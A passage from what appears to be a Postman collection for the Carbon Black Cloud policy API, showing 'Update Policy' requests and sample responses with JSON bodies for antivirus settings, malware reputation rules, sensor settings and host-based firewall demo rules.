to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n            \"name\": \"Host Based Firewall\",\n            \"description\": \"These are the Host based Firewall Rules which will be executed by the sensor. The Definition will be part of Main Policies.\",\n            \"inherited_from\": \"\",\n            \"category\": \"host_based_firewall\",\n            \"parameters\": {\n                \"rule_groups\": [\n                    {\n                        \"description\": \"Description of Demo Rule Group\",\n                        \"name\": \"Demo Rule Group\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"SDK Example Rule\",\n                                \"network_profile\": [\n                                    \"PUBLIC\",\n                                    \"PRIVATE\",\n                                    \"DOMAIN\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"94ab82ca-d8bf-4496-94c3-c9b4aeb4832d\",\n                                \"rule_inbound_event_check_guid\": \"84312e52-f4bb-4d2a-a23f-f01986d6813c\",\n                                \"rule_outbound_event_check_guid\": \"35e9ae4c-6d42-48f5-904a-d2e1be959595\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"7235fcbd-1c3a-4ace-b350-6b079a1e7d2a\"\n                    },\n                    {\n                        \"description\": \"testing bug with saving is fixed\",\n                        \"name\": \"rule_group_202306230_01\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"test01 rule\",\n                                \"network_profile\": [\n                                    \"PUBLIC\",\n                                    \"PRIVATE\",\n                                    \"DOMAIN\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"a64e7409-4465-4162-a69a-2337e0e0d09c\",\n                                \"rule_inbound_event_check_guid\": \"23e0548f-2d68-41be-ac4e-e9c9c60e4d51\",\n                                \"rule_outbound_event_check_guid\": \"595cb409-b2c3-4f01-ac91-797a9f3147bd\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"87ddb873-124f-4e9d-93d9-d0fea0d2c967\"\n                    }\n                ],\n                \"default_rule\": {\n                    \"action\": \"ALLOW\",\n                    \"default_rule_access_check_guid\": \"0f4d11c5-cfb2-405d-9482-24ddf813dd02\",\n                    \"default_rule_inbound_event_check_guid\": \"76d0d19f-b499-4c23-a9cb-79583fad154b\",\n                    \"default_rule_outbound_event_check_guid\": \"d7b42c09-7819-4f6b-a5ab-2a99e0a5c26b\"\n                },\n                \"enable_host_based_firewall\": false\n            }\n        },\n        {\n            \"id\": \"1f8a5e4b-34f2-4d31-9f8f-87c56facaec8\",\n            \"name\": \"Advanced Scripting Prevention\",\n            \"description\": \"Addresses malicious fileless and file-backed scripts that leverage native programs and common scripting languages.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"c4ed61b3-d5aa-41a9-814f-0f277451532b\",\n            \"name\": \"Carbon Black Threat Intel\",\n            \"description\": \"Addresses common and pervasive TTPs used for malicious activity as well as living off the land TTPs/behaviors detected by Carbon Black’s Threat Analysis Unit.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n            \"name\": \"Persistence\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"BLOCK\"\n            }\n        },\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Authentication Events\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"1664f2e6-645f-4d6e-98ec-0c80485cbe0f\",\n            \"name\": \"Event Reporting Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes from reporting events to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Tune collection of events from prevalent modules\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        },\n        {\n            \"id\": \"ac67fa14-f6be-4df9-93f2-6de0dbd96061\",\n            \"name\": \"Credential Theft\",\n            \"description\": \"Addresses threat actors obtaining credentials and relies on detecting the malicious use of TTPs/behaviors that indicate such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"88b19232-7ebb-48ef-a198-2a75a282de5d\",\n            \"name\": \"Privilege Escalation\",\n            \"description\": \"Addresses behaviors that indicate a threat actor has gained elevated access via a bug or misconfiguration within an operating system, and leverages the detection of TTPs/behaviors to prevent such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"97a03cc2-5796-4864-b16d-790d06bea20d\",\n            \"name\": \"Defense Evasion\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to avoid detection such as uninstalling or disabling security software, obfuscating or encrypting data/scripts and abusing trusted processes to hide and disguise their malicious activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        }\n    ],\n    \"sensor_configs\": []\n}"}],"_postman_id":"e0a7d32e-0643-4f69-ad5e-815191b3bd16"},{"name":"Update Policy","id":"baf18a46-1e15-480f-a6ff-9b888a9a0e66","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"warning":"This is a duplicate header and will be overridden by the X-Auth-Token header generated by Postman.","key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n        \"policy_modification\": true,\n        \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rapid_configs\": []\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}","description":"<p>Modify an existing policy</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"06e2a832-e84f-4501-b6af-6ad788ffcb16","name":"Update Policy","originalRequest":{"method":"PUT","header":[{"key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID"}],"body":{"mode":"raw","raw":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n        \"policy_modification\": true,\n        \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rule_configs\": []\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 4920125,\n    \"name\": \"Standard\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"MEDIUM\",\n    \"position\": -1,\n    \"is_system\": true,\n    \"description\": \"Prevents known malware and reduces false positives. Used as the default policy for all new sensors, unless sensor group criteria is met.\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_delete_known_bad_hashes_delay\": null,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": false,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": true,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": true,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"days\": null,\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": true,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        },\n        {\n            \"id\": 2,\n            \"required\": false,\n            \"action\": \"TERMINATE\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"COMPANY_BLACK_LIST\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        }\n    ],\n    \"managed_detection_response_permissions\": {\n        \"policy_modification\": true,\n        \"quarantine\": true\n    },\n    \"version\": null,\n    \"message\": null,\n    \"rule_configs\": []\n}"},{"id":"dcefee46-cf81-471b-9c55-8a542494387d","name":"Update Policy - Host-based Firewall","originalRequest":{"method":"PUT","header":[{"key":"X-Auth-Token","value":"Custom API Secret Key/Custom API ID"}],"body":{"mode":"raw","raw":"{\n    \"id\": 12345677,\n    \"name\": \"Hostbased Firewall Demo\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"LOW\",\n    \"position\": -1,\n    \"is_system\": false,\n    \"description\": \"\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_deregister_inactive_vm_workloads_interval_ms\": 0,\n    \"update_time\": 1687556026798,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": true,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": false,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": false,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": false,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"DENY\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    \"sensor_settings\": [\n        {\n            \"name\": \"ALLOW_UNINSTALL\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"SHOW_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ENABLE_THREAT_SHARING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"LOGGING_LEVEL\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"QUARANTINE_DEVICE_MESSAGE\",\n            \"value\": \"Your device has been quarantined. Please contact your administrator.\"\n        },\n        {\n            \"name\": \"SET_SENSOR_MODE\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SENSOR_RESET\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BACKGROUND_SCAN\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"POLICY_ACTION_OVERRIDE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"HELP_MESSAGE\",\n            \"value\": \"\"\n        },\n        {\n            \"name\": \"PRESERVE_SYSTEM_MEMORY_SCAN\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"HASH_MD5\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_LARGE_FILE_READ\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_EXECUTE_ON_NETWORK_DRIVE\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"DELAY_EXECUTE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SCAN_NETWORK_DRIVE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_LOGIN_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"BYPASS_AFTER_RESTART_MINS\",\n            \"value\": \"0\"\n        },\n        {\n            \"name\": \"SHOW_FULL_UI\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"SECURITY_CENTER_OPT\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"CB_LIVE_RESPONSE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"ALLOW_INLINE_BLOCKING\",\n            \"value\": \"true\"\n        },\n        {\n            \"name\": \"UNINSTALL_CODE\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"DEFENSE_OPT_OUT\",\n            \"value\": \"false\"\n        },\n        {\n            \"name\": \"UBS_OPT_IN\",\n            \"value\": \"false\"\n        }\n    ],\n    \"rule_configs\": [\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n            \"name\": \"Host Based Firewall\",\n            \"description\": \"These are the Host based Firewall Rules which will be executed by the sensor. The Definition will be part of Main Policies.\",\n            \"inherited_from\": \"\",\n            \"category\": \"host_based_firewall\",\n            \"parameters\": {\n                \"rule_groups\": [\n                    {\n                        \"description\": \"Description of Demo Rule Group\",\n                        \"name\": \"Demo Rule Group\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"SDK Example Rule\",\n                                \"network_profile\": [\n                                    \"DOMAIN\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"94ab82ca-d8bf-4496-94c3-c9b4aeb4832d\",\n                                \"rule_inbound_event_check_guid\": \"84312e52-f4bb-4d2a-a23f-f01986d6813c\",\n                                \"rule_outbound_event_check_guid\": \"35e9ae4c-6d42-48f5-904a-d2e1be959595\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"7235fcbd-1c3a-4ace-b350-6b079a1e7d2a\"\n                    },\n                    {\n                        \"description\": \"another example\",\n                        \"name\": \"rule_group_202306230_01\",\n                        \"rules\": [\n                            {\n                                \"action\": \"ALLOW\",\n                                \"application_path\": \"C:\\\\sdk\\\\example\\\\allow\\\\rule\\\\path\",\n                                \"direction\": \"IN\",\n                                \"enabled\": false,\n                                \"local_ip_address\": \"11.12.13.14\",\n                                \"local_port_ranges\": \"1313\",\n                                \"name\": \"test01 rule\",\n                                \"network_profile\": [\n                                    \"PUBLIC\"\n                                ],\n                                \"protocol\": \"TCP\",\n                                \"remote_ip_address\": \"15.16.17.18\",\n                                \"remote_port_ranges\": \"2121\",\n                                \"rule_access_check_guid\": \"a64e7409-4465-4162-a69a-2337e0e0d09c\",\n                                \"rule_inbound_event_check_guid\": \"23e0548f-2d68-41be-ac4e-e9c9c60e4d51\",\n                                \"rule_outbound_event_check_guid\": \"595cb409-b2c3-4f01-ac91-797a9f3147bd\",\n                                \"test_mode\": false\n                            }\n                        ],\n                        \"ruleset_id\": \"87ddb873-124f-4e9d-93d9-d0fea0d2c967\"\n                    }\n                ],\n                \"default_rule\": {\n                    \"action\": \"ALLOW\",\n                    \"default_rule_access_check_guid\": \"0f4d11c5-cfb2-405d-9482-24ddf813dd02\",\n                    \"default_rule_inbound_event_check_guid\": \"76d0d19f-b499-4c23-a9cb-79583fad154b\",\n                    \"default_rule_outbound_event_check_guid\": \"d7b42c09-7819-4f6b-a5ab-2a99e0a5c26b\"\n                },\n                \"enable_host_based_firewall\": false\n            }\n        },\n        {\n            \"id\": \"1f8a5e4b-34f2-4d31-9f8f-87c56facaec8\",\n            \"name\": \"Advanced Scripting Prevention\",\n            \"description\": \"Addresses malicious fileless and file-backed scripts that leverage native programs and common scripting languages.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"c4ed61b3-d5aa-41a9-814f-0f277451532b\",\n            \"name\": \"Carbon Black Threat Intel\",\n            \"description\": \"Addresses common and pervasive TTPs used for malicious activity as well as living off the land TTPs/behaviors detected by Carbon Black’s Threat Analysis Unit.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n            \"name\": \"Persistence\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"BLOCK\"\n            }\n        },\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Authentication Events\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"1664f2e6-645f-4d6e-98ec-0c80485cbe0f\",\n            \"name\": \"Event Reporting Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes from reporting events to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Tune collection of events from prevalent modules\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        },\n        {\n            \"id\": \"ac67fa14-f6be-4df9-93f2-6de0dbd96061\",\n            \"name\": \"Credential Theft\",\n            \"description\": \"Addresses threat actors obtaining credentials and relies on detecting the malicious use of TTPs/behaviors that indicate such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"88b19232-7ebb-48ef-a198-2a75a282de5d\",\n            \"name\": \"Privilege Escalation\",\n            \"description\": \"Addresses behaviors that indicate a threat actor has gained elevated access via a bug or misconfiguration within an operating system, and leverages the detection of TTPs/behaviors to prevent such activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        },\n        {\n            \"id\": \"97a03cc2-5796-4864-b16d-790d06bea20d\",\n            \"name\": \"Defense Evasion\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to avoid detection such as uninstalling or disabling security software, obfuscating or encrypting data/scripts and abusing trusted processes to hide and disguise their malicious activity.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"REPORT\"\n            }\n        }\n    ],\n    \"sensor_configs\": []\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 18 Dec 2023 03:06:31 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Traceid","value":"f0155585-f0f5-4bf4-a718-55da485043f9"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": 12345677,\n    \"name\": \"Hostbased Firewall Demo\",\n    \"org_key\": \"ABCD1234\",\n    \"priority_level\": \"LOW\",\n    \"position\": 1,\n    \"is_system\": false,\n    \"description\": \"\",\n    \"auto_deregister_inactive_vdi_interval_ms\": 0,\n    \"auto_deregister_inactive_vm_workloads_interval_ms\": 0,\n    \"update_time\": 1702868790170,\n    \"av_settings\": {\n        \"avira_protection_cloud\": {\n            \"enabled\": true,\n            \"max_exe_delay\": 45,\n            \"max_file_size\": 4,\n            \"risk_level\": 4\n        },\n        \"on_access_scan\": {\n            \"enabled\": false,\n            \"mode\": \"NORMAL\"\n        },\n        \"on_demand_scan\": {\n            \"enabled\": false,\n            \"profile\": \"NORMAL\",\n            \"schedule\": {\n                \"start_hour\": 0,\n                \"range_hours\": 0,\n                \"recovery_scan_if_missed\": true\n            },\n            \"scan_usb\": \"AUTOSCAN\",\n            \"scan_cd_dvd\": \"AUTOSCAN\"\n        },\n        \"signature_update\": {\n            \"enabled\": false,\n            \"schedule\": {\n                \"full_interval_hours\": 0,\n                \"initial_random_delay_hours\": 4,\n                \"interval_hours\": 4\n            }\n        },\n        \"update_servers\": {\n            \"servers_override\": [],\n            \"servers_for_onsite_devices\": [\n                {\n                    \"server\": \"http://updates2.cdc.carbonblack.io/update2\",\n                    \"preferred\": false\n                }\n            ],\n            \"servers_for_offsite_devices\": [\n                \"http://updates2.cdc.carbonblack.io/update2\"\n            ]\n        }\n    },\n    \"rules\": [\n        {\n            \"id\": 1,\n            \"required\": false,\n            \"action\": \"DENY\",\n            \"application\": {\n                \"type\": \"REPUTATION\",\n                \"value\": \"KNOWN_MALWARE\"\n            },\n            \"operation\": \"RUN\"\n        }\n    ],\n    \"directory_action_rules\": [],\n    